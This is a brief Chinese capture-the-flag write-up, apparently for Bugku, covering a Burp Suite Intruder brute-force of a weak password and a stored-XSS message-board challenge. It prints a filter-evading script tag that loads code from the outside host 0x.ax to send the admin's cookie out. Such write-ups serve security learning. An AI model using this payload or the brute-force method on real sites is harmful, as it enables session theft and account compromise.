有时间再说,持续更新
bp
提示:弱密码top1000?z???
首先,burpsuite—>Intruder—>Sniper爆破该密码,发现包长度都一致,爆破不成功。根据题目提示,字典应该是没有问题的,所以不考虑这个可能。
然后,查看返回包,显然如果密码正确,r.code
的值就不会是bugku10000,根据返回包长度都一致,可以推断,r.code
的值为10位
<script>
var r = {code: 'bugku10000'}
if(r.code == 'bugku10000'){
console.log('e');
document.getElementById('d').innerHTML = "Wrong account or password!";
}else{
console.log('0');
window.location.href = 'success.php?code='+r.code;
}
</script>
下面需要做的就是过滤掉响应内容为{code: 'bugku10000'}
的包
Burp-Intruder-options-Grep match加上这个内容即可。
留言板
xss平台直接搞个payload放进去,然后管理员会自己访问,cookie就传过来了,看样子是把()
过滤成||
,不用window.open()就好了。我用的payload:<sCRiPt sRC=//0x.ax/jP7G></sCrIpT>